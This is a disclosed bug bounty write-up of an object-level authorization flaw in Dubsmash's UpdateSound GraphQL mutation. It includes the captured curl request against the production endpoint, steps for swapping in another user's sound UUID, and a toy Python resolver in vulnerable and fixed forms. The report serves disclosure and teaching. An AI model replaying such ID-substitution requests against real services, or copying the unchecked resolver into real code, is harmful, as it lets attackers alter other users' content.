Background:
Dubsmash, initially released in 2014, is a New York-based video-sharing social media service application for iOS and Android. On December 13, 2020, Reddit announced it had acquired Dubsmash.
Dubsmash lets users record themselves lip-syncing over soundtracks such as excerpts of songs, movie dialogue, and famous quotes. Users can pick soundtracks from a large music library managed by Dubsmash, or upload their own soundtracks to the application.
Vulnerability Description:
During security research on the Dubsmash iOS application, I found that the UpdateSound GraphQL mutation was vulnerable to Broken Object Level Authorization (BOLA). BOLA occurs when an API accepts an object identifier from the client and acts on that object without verifying that the authenticated caller is allowed to access it; any user can then read or modify other users' objects simply by supplying their identifiers. The same class of flaw is commonly called an insecure direct object reference (IDOR).
The server did not check whether the sound referenced by the ‘uuid’ parameter of the UpdateSound mutation belonged to the logged-in user. Because sound UUIDs are exposed in ordinary API responses, an attacker could rename any soundtrack on the platform by substituting its UUID into an otherwise legitimate request of their own.
Original Report Link: https://hackerone.com/reports/1102365
Vulnerable Request:
curl -i -s -k -X $'POST' \
  -H $'Host: gateway-production.dubsmash.com' \
  -H $'X-Dmac: ' \
  -H $'X-Remote-Config-Values: []' \
  -H $'X-Time: 1613158267' \
  -H $'User-Agent: Dopesmash/5.20.0 (com.mobilemotion.dubsmash; build:45431; iOS 14.0.1) Alamofire/5.4.0' \
  -H $'X-Accept-Content-Language: en_IN' \
  -H $'X-Device-Timezone: 19800' \
  -H $'X-Device-Language: en' \
  -H $'X-Device-Country: IN' \
  -H $'X-Build-Number: 45431' \
  -H $'Content-Length: 676' \
  -H $'X-App-Version: 5.20.0' \
  -H $'X-Platform: ios' \
  -H $'Connection: close' \
  -H $'Authorization: Bearer XXXXXX' \
  -H $'X-Dubsmash-Device-Id: 0675382B-668E-4EB7-8313-ED96BC132DC9' \
  -H $'Accept-Language: en-IN;q=1.0, hi-IN;q=0.9' \
  -H $'Accept: application/json' \
  -H $'Content-Type: application/json' \
  -H $'X-Dmac-Version: 2' \
  -H $'If-None-Match: W/\"88-IVjhmW06Njcacim4nwHnJNviYsE\"' \
  -b $'__cfduid=' \
  --data-binary $'{\"query\":\"mutation UpdateSound($input: UpdateSoundInput!) {\n updateSound(input: $input) {\n __typename\n sound {\n __typename\n ...SoundFragment\n }\n }\n}\nfragment SoundFragment on Sound {\n __typename\n uuid\n created_at\n sound\n name\n waveform_raw_data\n liked\n soundStatus: status\n creator {\n __typename\n ...ContentCreatorFragment\n }\n share_link\n num_likes\n num_videos\n}\nfragment ContentCreatorFragment on User {\n __typename\n username\n uuid\n date_joined\n followed\n has_invite_badge\n badges\n profile_picture\n}\",\"variables\":{\"input\":{\"uuid\":\"a687eb61ad814a09a8a85cedef7837f3\",\"name\":\"test12355556777\"}}}' \
  $'https://gateway-production.dubsmash.com/graphql?build_number=45431&platform=ios'
Steps to Reproduce:
- Uploaded a soundtrack in the Dubsmash iOS app under the ‘My Sounds’ section.
- Edited the sound's title and captured the resulting UpdateSound GraphQL request in Burp Suite.
- Replaced the ‘uuid’ value in the request body with another soundtrack's UUID. Soundtrack UUIDs are disclosed in the responses of multiple API endpoints, so no guessing is required.
- Forwarded the modified request to the server. The other soundtrack's title was changed.
Impact:
An attacker could change the title of any soundtrack on the platform using only its UUID, which is publicly exposed. Since the request is a single authenticated mutation with a predictable shape, a simple automated script could rename every soundtrack in the music library.
Recommended Fix:
I recommended adding an object-level authorization check to the UpdateSound endpoint: on the server side, resolve the sound by the supplied ‘uuid’, compare its owner with the user identified by the session token, and reject the mutation (for example with a not-found or forbidden response) when they do not match. The check must live on the server; the client-supplied UUID must never be treated as proof of ownership.
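The following is an added example, not Dubsmash's or Reddit's code: a minimal updateSound resolver that reproduces the missing ownership check described above, beside a fixed version, driven by a request body shaped like the captured mutation. The data model (a Sound with a creator_uuid field), the bearer-token table, and the sample UUIDs are assumptions made for illustration.

```python
# Added example (not the vendor's code). A toy updateSound resolver showing the
# BOLA pattern from the report and its fix. Sound/creator_uuid, the token table
# and the sample uuids are constructed for illustration.
from dataclasses import dataclass


class NotAuthorized(Exception):
    """Raised when the caller may not act on the requested object."""


@dataclass
class Sound:
    uuid: str          # public identifier, visible in many API responses
    name: str          # the title the mutation edits
    creator_uuid: str  # owner; the field the vulnerable resolver never consults


# Constructed sample state: two users, each owning one sound.
SOUNDS = {
    "sound-of-alice": Sound("sound-of-alice", "alice original", "user-alice"),
    "sound-of-bob": Sound("sound-of-bob", "bob original", "user-bob"),
}
BEARER_TOKENS = {"token-alice": "user-alice", "token-bob": "user-bob"}


def authenticate(headers):
    """Map the Authorization header to a user uuid. Authentication only:
    this says who the caller is, not what they may touch."""
    token = headers.get("Authorization", "").removeprefix("Bearer ").strip()
    user = BEARER_TOKENS.get(token)
    if user is None:
        raise NotAuthorized("invalid bearer token")
    return user


def update_sound_vulnerable(headers, body, sounds=SOUNDS):
    """Vulnerable: authenticates the caller, then trusts input.uuid as-is."""
    authenticate(headers)
    sound_input = body["variables"]["input"]
    sound = sounds[sound_input["uuid"]]   # any uuid the client names
    sound.name = sound_input["name"]
    return sound


def update_sound_fixed(headers, body, sounds=SOUNDS):
    """Fixed: resolve the object, then check ownership against the session."""
    caller = authenticate(headers)
    sound_input = body["variables"]["input"]
    sound = sounds.get(sound_input["uuid"])
    # One failure mode for "does not exist" and "not yours", so the endpoint
    # does not confirm which uuids exist. The client-supplied uuid never
    # decides access; the server-side owner field does.
    if sound is None or sound.creator_uuid != caller:
        raise NotAuthorized("sound not found")
    sound.name = sound_input["name"]
    return sound


def mutation_body(uuid, name):
    """JSON body in the shape of the captured UpdateSound request; the
    operation text is omitted because the resolvers only read variables."""
    return {"variables": {"input": {"uuid": uuid, "name": name}}}


def cross_user_update(resolver):
    """Bob replays his own request with Alice's sound uuid, as in the report.
    Returns Alice's sound title afterwards and whether the resolver refused."""
    sounds = {k: Sound(v.uuid, v.name, v.creator_uuid) for k, v in SOUNDS.items()}
    headers = {"Authorization": "Bearer token-bob"}
    try:
        resolver(headers, mutation_body("sound-of-alice", "tampered by bob"), sounds)
        refused = False
    except NotAuthorized:
        refused = True
    return sounds["sound-of-alice"].name, refused


if __name__ == "__main__":
    print("vulnerable:", cross_user_update(update_sound_vulnerable))  # ('tampered by bob', False)
    print("fixed:     ", cross_user_update(update_sound_fixed))       # ('alice original', True)
```

The authentication step is identical in both resolvers; the only difference is that the fixed one consults the owner stored with the object before writing. Returning the same error for a missing and a foreign uuid is a deliberate choice so the mutation cannot be used to enumerate which sound UUIDs exist.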
Timeline:
13 Feb, 2021: Report submitted to Reddit’s bug bounty program
22 Feb, 2021: Reddit’s security team requested more information
22 Feb, 2021: Shared additional details with Reddit’s security team
24 Feb, 2021: Reddit’s security team triaged the submission
1 Mar, 2021: Reddit’s team confirmed the issue was resolved and awarded a $3000 bounty